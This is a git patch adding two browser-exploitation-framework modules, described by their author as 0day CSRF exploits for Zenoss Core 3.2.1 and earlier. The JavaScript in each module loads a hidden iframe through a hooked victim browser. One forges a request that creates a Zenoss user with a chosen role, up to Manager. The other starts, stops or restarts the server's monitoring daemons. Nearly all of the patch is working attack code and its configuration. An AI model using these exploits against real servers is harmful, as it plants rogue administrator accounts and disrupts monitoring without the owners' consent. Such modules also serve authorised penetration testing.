From c1975691f438c46ee5183cb4205b68f811873a11 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 7 Mar 2012 15:02:12 +1030
Subject: [PATCH] Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1

---
 .../exploits/zenoss_add_user_csrf/command.js  | 33 +++++++++
 .../exploits/zenoss_add_user_csrf/config.yaml | 25 +++++++
 .../exploits/zenoss_add_user_csrf/module.rb   | 46 ++++++++++++
 .../exploits/zenoss_daemon_csrf/command.js    | 32 +++++++++
 .../exploits/zenoss_daemon_csrf/config.yaml   | 25 +++++++
 modules/exploits/zenoss_daemon_csrf/module.rb | 70 +++++++++++++++++++
 6 files changed, 231 insertions(+)
 create mode 100644 modules/exploits/zenoss_add_user_csrf/command.js
 create mode 100644 modules/exploits/zenoss_add_user_csrf/config.yaml
 create mode 100644 modules/exploits/zenoss_add_user_csrf/module.rb
 create mode 100644 modules/exploits/zenoss_daemon_csrf/command.js
 create mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml
 create mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb

diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
new file mode 100644
index 000000000..9650a2684
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -0,0 +1,33 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>'; 
+  var user_level = '<%= @user_level %>';
+  var username = '<%= @username %>';
+  var password = '<%= @password %>';
+
+  var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
+  zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(zenoss_add_user_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
new file mode 100644
index 000000000..3ae083e7a
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        zenoss_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss Add User CSRF"
+            description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
new file mode 100644
index 000000000..28fac6d60
--- /dev/null
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
@@ -0,0 +1,46 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Zenoss_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'user_level',
+				'type' => 'combobox',
+				'ui_label' => 'User Level',
+				'store_type' => 'arraystore',
+				'store_fields' => ['user_level'],
+				'store_data' => [
+					['Manager'],
+					['ZenManager'],
+					['ZenUser']
+				],
+				'emptyText' => 'Select a user level ("Manager" is highest)',
+				'valueField' => 'user_level',
+				'displayField' => 'user_level',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js
new file mode 100644
index 000000000..4b753f8ea
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/command.js
@@ -0,0 +1,32 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>'; 
+  var service = '<%= @service %>';
+  var action = '<%= @action %>';
+
+  var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
+  zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(zenoss_daemon_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml
new file mode 100644
index 000000000..9249f7d99
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        zenoss_daemon_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss Daemon CSRF"
+            description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
new file mode 100644
index 000000000..148f0c6bf
--- /dev/null
+++ b/modules/exploits/zenoss_daemon_csrf/module.rb
@@ -0,0 +1,70 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Zenoss_daemon_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
+			{ 'name' => 'service',
+				'type' => 'combobox',
+				'ui_label' => 'Daemon',
+				'store_type' => 'arraystore',
+				'store_fields' => ['service', 'description'],
+				'store_data' => [
+					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
+					['zopectl', 'zopectl (The Zope open source web application server)'],
+					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
+					['zenjobs', 'zenjobs (Zenjobs)'],
+					['zenping', 'zenping (ICMP ping status monitoring)'],
+					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
+					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
+					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
+					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
+					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
+					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
+					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
+					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
+					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
+					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
+					['zenjmx', 'zenjmx (ZenJMX)']
+				],
+				'emptyText' => 'Select a daemon',
+				'valueField' => 'service',
+				'displayField' => 'service', #'description',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+			{ 'name' => 'action',
+				'type' => 'combobox',
+				'ui_label' => 'Action',
+				'store_type' => 'arraystore',
+				'store_fields' => ['action'],
+				'store_data' => [
+					['Start'],['Stop'],['Restart']
+				],
+				'valueField' => 'action',
+				'displayField' => 'action',
+				'mode' => 'local',
+				'autoWidth' => true
+			}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end